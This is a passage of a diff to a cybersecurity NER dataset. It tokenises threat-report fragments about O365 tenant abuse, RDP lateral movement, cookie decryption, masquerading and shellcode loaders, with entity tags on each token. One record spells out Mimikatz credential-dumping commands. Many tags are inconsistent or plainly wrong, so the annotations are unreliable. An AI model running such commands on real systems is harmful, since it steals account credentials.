"ner_tags": [ + "B-Time", + "O" + ] + }, + { + "tokens": [ + "As", + "tasklist", + "uses", + "WMI", + "“under", + "the", + "hood," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malicious", + "authentications", + "into", + "victim", + "O365", + "tenants", + "had", + "originated", + "from", + "within", + "the", + "victim’s", + "own", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "was", + "making", + "authentications", + "to", + "O365" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Log", + "in", + "to", + "O365", + "as", + "a", + "user", + "with", + "privileged", + "access", + "to", + "cloud", + "resources." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "succeeded", + "in", + "authenticating", + "into", + "victim", + "O365", + "tenants" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "This", + "threat", + "actor", + "abused", + "access", + "to", + "accounts", + "in", + "the", + "Cloud", + "Solution", + "Partner’s", + "environment", + "with", + "legitimate", + "delegated", + "administrative", + "privileges", + "to", + "then", + "gain", + "access", + "to", + "several", + "customers’", + "O365", + "environments" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "connected", + "to", + "the", + "victim’s", + "O365", + "tenant" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "user", + "account", + "used", + "to", + "connect", + "to", + "the", + "victim’s", + "O365", + "tenant" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "managed", + "to", + "continue", + "to", + "access", + "the", + "victim’s", + "cloud", + "environment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "accounts", + "that", + "were", + "used", + "to", + "authenticate", + "to", + "the", + "cloud." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "used", + "a", + "compromised", + "O365", + "administrator", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "created", + "new", + "O365", + "Service", + "Principals", + "to", + "maintain", + "access", + "to", + "victim’s", + "environments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "used", + "accounts", + "with", + "Delegated", + "Administrator", + "rights", + "to", + "access", + "other", + "O365", + "tenants" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "leveraged", + "different", + "credentials", + "for", + "each", + "step", + "while", + "moving", + "laterally", + "through", + "the", + "victim’s", + "network" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "privileged", + "accounts", + "and", + "then", + "accessed", + "the", + "wiki", + "using", + "a", + "different", + "set", + "of", + "credentials." + ], + "ner_tags": [ + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "began", + "attempting", + "to", + "connect", + "into", + "the", + "environment", + "via", + "VPN" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "attempted", + "to", + "log", + "in", + "to", + "the", + "VPN", + "using", + "several", + "user", + "accounts" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actor", + "had", + "knowledge", + "of", + "these", + "accounts", + "and", + "used", + "them", + "on", + "the", + "correct", + "systems" + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "connected", + "into", + "the", + "victim’s", + "environment", + "via", + "a", + "VPN" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "Threat", + "actor", + "also", + "used", + "valid", + "accounts", + "to", + "create", + "persistence", + "within", + "the", + "environment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "establish", + "a", + "Remote", + "Desktop", + "Protocol", + "(RDP)", + "session", + "to", + "an", + "internal", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establish", + "another", + "RDP", + "session", + "to", + "a", + "different", + "internal", + "server" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "connected", + "via", + "RDP", + "to", + "a", + "user’s", + "workstation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor’s", + "RDP", + "session." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "established", + "RDP", + "sessions", + "to", + "internal", + "servers" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "connected", + "via", + "Remote", + "Desktop" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "user", + "the", + "threat", + "actor", + "used", + "to", + "RDP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "connected", + "via", + "Remote", + "Desktop", + "to", + "a", + "Domain", + "Controller" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "used", + "both", + "privileged", + "and", + "non-privileged", + "accounts", + "for", + "RDP", + "throughout", + "the", + "environment,", + "depending", + "on", + "the", + "target", + "system" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "domain", + "service", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "domain", + "administrator’s", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "could", + "have", + "easily", + "used", + "a", + "second", + "domain", + "administrator", + "account" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "accomplished", + "this", + "by", + "using", + "administrative", + "accounts" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "given", + "user", + "account", + "was", + "also", + "authenticating", + "to", + "Active", + "Directory", + "from", + "a", + "given", + "source", + "IP", + "address", + "two", + "years", + "prior" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "user", + "account", + "was", + "known", + "to", + "have", + "recently", + "been", + "abused", + "by", + "the", + "threat", + "actor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "accessing", + "the", + "wiki", + "as", + "users", + "who", + "would", + "be", + "considered", + "“non-privileged”" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "local", + "account", + "was", + "used", + "by", + "the", + "Threat", + "Actor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "connect", + "via", + "SMB", + "to", + "targeted", + "users,", + "and", + "then", + "copy", + "their", + "Chrome", + "profile", + "directories", + "as", + "well", + "as", + "data", + "protection", + "API", + "(DPAPI)", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "connected", + "via", + "Remote", + "Desktop", + "to", + "a", + "Domain", + "Controller", + "and", + "copied", + "the", + "DSInternals10", + "PowerShell", + "module", + "to", + "the", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "must", + "first", + "decrypt", + "them" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "decrypted", + "the", + "cookies", + "file", + "using", + "the", + "user’s", + "DPAPI", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "of", + "the", + "cookies" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deleted", + "the", + "specific", + "history", + "items", + "related", + "to", + "threat", + "actor", + "activity" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attempted", + "to", + "blend", + "in", + "with", + "a", + "file", + "name", + "that", + "matched", + "the", + "system", + "name", + "it", + "resided", + "on" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attempted", + "to", + "blend", + "in", + "with", + "a", + "file", + "name", + "that", + "matched", + "the", + "system", + "name", + "it", + "resided", + "on" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "the", + "binary", + "named", + "to", + "masquerade", + "as", + "a", + "legitimate", + "file", + "on", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AdFind", + "was", + "renamed", + "to", + "masquerade", + "as", + "a", + "legitimate", + "Windows", + "binary" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "renamed", + "their", + "utilities", + "to", + "masquerade", + "as", + "legitimate", + "system", + "binaries", + "(AdFind", + "as", + "svchost.exe),", + "match", + "the", + "system’s", + "role", + "(GoldMax),", + "or", + "appear", + "legitimate", + "(TrailBlazer", + "as", + "an", + "apparent", + "Adobe", + "utility)." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "renamed", + "their", + "systems", + "prior", + "to", + "connecting", + "to", + "victim’s", + "VPNs", + "to", + "match", + "the", + "victim’s", + "system", + "naming", + "convention" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Masquerades", + "its", + "command-and-control", + "(C2)", + "traffic", + "as", + "legitimate", + "Google", + "Notifications", + "HTTP", + "requests" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "placed", + "in", + "a", + "hidden", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "directories", + "with", + "random", + "names", + "of", + "a", + "consistent", + "length", + "were", + "navigated", + "to", + "by", + "the", + "same", + "user", + "that", + "ran", + "the", + "tool." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ListUsers" + ], + "ner_tags": [ + "B-Time" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "attempted", + "to", + "remotely", + "list", + "running", + "processes", + "on", + "systems", + "using", + "tasklist.exe" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "process", + "listing" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "remote", + "process", + "listing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "was", + "running", + "tasklist", + "remotely", + "on", + "these", + "systems", + "specifically", + "to", + "see", + "which", + "of", + "the", + "target", + "systems", + "was", + "running", + "Google", + "Chrome." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "regularly", + "interrogated", + "other", + "systems", + "using", + "tasklist.exe" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "use", + "of", + "a", + "PowerShell", + "script", + "to", + "execute", + "Mimikatz", + "in-memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "to", + "execute", + "the", + "Mimikatz", + "commands", + "‘privilege::debug", + "sekurlsa::logonpasswords", + "“lsadump::lsa", + "/patch”‘", + "in-memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "script", + "executed", + "by", + "the", + "threat", + "actor", + "was", + "heavily", + "obfuscated", + "and", + "encrypted", + "the", + "output", + "using", + "AES256." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "used", + "a", + "heavily", + "obfuscated", + "PowerShell", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Way" + ] + }, + { + "tokens": [ + "enumerating", + "current", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "tries", + "to", + "enumerate", + "the", + "current", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "crawl", + "the", + "filesystem" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "try", + "to", + "decrypt", + "it", + "using", + "the", + "RC4", + "encryption", + "scheme", + "with", + "the", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "decrypts", + "and", + "communicates", + "to" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "the", + "embedded", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contain", + "encrypted", + "C2", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Embedded", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "has", + "an", + "encrypted", + "payload", + "embedded", + "in", + "it." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "side", + "loading", + "“ffmpeg.dll”." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "that", + "have", + "Base64", + "and", + "AES", + "encrypted", + "C2’s", + "appended", + "to", + "them" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "NetWkstaGetInfo()", + "API." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "name,", + "Hostname", + "and", + "OS", + "Version" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "info", + "stealer", + "also", + "collects", + "information", + "on", + "infected", + "hosts" + ], + "ner_tags": [ + "O", + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Manipulates", + "registry" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "and", + "executing", + "the", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "a", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "performed", + "through", + "the", + "CryptUnprotectData", + "API", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "shellcode", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encrypts", + "a", + "provided", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLLs", + "with", + "the", + "names", + "ualapi.dll", + "and", + "ncobjapi.dll", + "being", + "sideloaded" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "system", + "information", + "and", + "browser", + "history,", + "then", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "an", + "infostealer", + "and", + "starts", + "it." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Performs", + "payload", + "injections", + "through", + "syscalls", + "via", + "mapping", + "a", + "shellcode", + "to", + "a", + "remote", + "process", + "and", + "creating", + "a", + "remote", + "thread." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "driver", + "collects", + "information", + "about", + "installed", + "AV", + "filters" + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Connects", + "to", + "a", + "given", + "host", + "via", + "a", + "socket", + "and", + "waits", + "for", + "the", + "server", + "to", + "send", + "data." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Manipulates", + "(creates,", + "lists,", + "starts,", + "stops", + "and", + "deletes)", + "services." + ], + "ner_tags": [ + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "attackers", + "placed" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "attackers", + "placed" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "administrator", + "credentials" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "compromised", + "administrative", + "[T1078.001]", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "user" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Access", + "to", + "valid" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "locate", + "high", + "value", + "assets", + "in", + "order", + "to", + "exfiltrate", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Spearphishing", + "emails", + "with", + "malicious", + "attachments" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attached", + "to", + "spearphishing", + "emails" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "exploitation", + "of", + "public-facing", + "applications" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "User", + "execution", + "[T1204]", + "of", + "malicious", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "steganography", + "[T1027.003]", + "to", + "hide", + "stolen", + "data", + "inside", + "other", + "files", + "stored", + "on", + "GitHub" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "multi-hop", + "proxies" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "stage", + "collected", + "data", + "locally" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exfiltration", + "over", + "C2", + "channel" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "24", + "different", + "IP", + "addresses", + "in", + "use" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compromised", + "devices", + "that", + "act", + "as", + "proxies", + "for", + "their", + "C&C", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "some", + "victims", + "as", + "proxies,", + "or", + "some", + "vulnerable", + "devices", + "to", + "forward", + "communication", + "to", + "their", + "real", + "C&C", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "phishing", + "emails", + "have", + "similar", + "topics", + "and", + "pretend", + "to", + "come", + "from", + "some", + "of", + "the", + "same", + "entities" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attachments", + "used", + "for", + "phishing", + "emails," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "emails", + "have", + "a", + "PDF", + "document", + "attached" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "PDF", + "file", + "attached" + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "used", + "emails", + "with", + "PDF", + "or", + "RTF", + "files", + "attached", + "that", + "contain", + "a", + "link", + "to", + "download", + "malware" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Tool", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "user", + "must", + "click", + "to", + "download", + "the", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "manually", + "extract", + "the", + "file", + "and", + "execute", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "attempted", + "to", + "get", + "users", + "to", + "execute", + "malicious", + "files", + "masquerading", + "as", + "documents" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "regular", + "RAR", + "archives", + "that", + "have", + "an", + "executable", + "file", + "inside." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "several", + "benign", + "files", + "that", + "are", + "written", + "to", + "disk", + "(they", + "are", + "not", + "part", + "of", + "NSIS", + "binaries", + "and", + "they", + "are", + "not", + "used", + "at", + "all", + "by", + "the", + "installer)", + "and", + "two", + "files", + "that", + "are", + "malicious" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reads", + "a", + "string", + "(or", + "binary", + "data)", + "from", + "its", + "resource", + "section" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reads", + "data", + "from", + "its", + "own", + "resource", + "section", + "and", + "decrypts", + "a", + "payload." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "read", + "from", + "an", + "encrypted", + "resource" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "two", + "shellcodes", + "contained", + "in", + "the", + "compiled", + "AutoIt", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Read", + "a", + "binary", + "from", + "its", + "resource", + 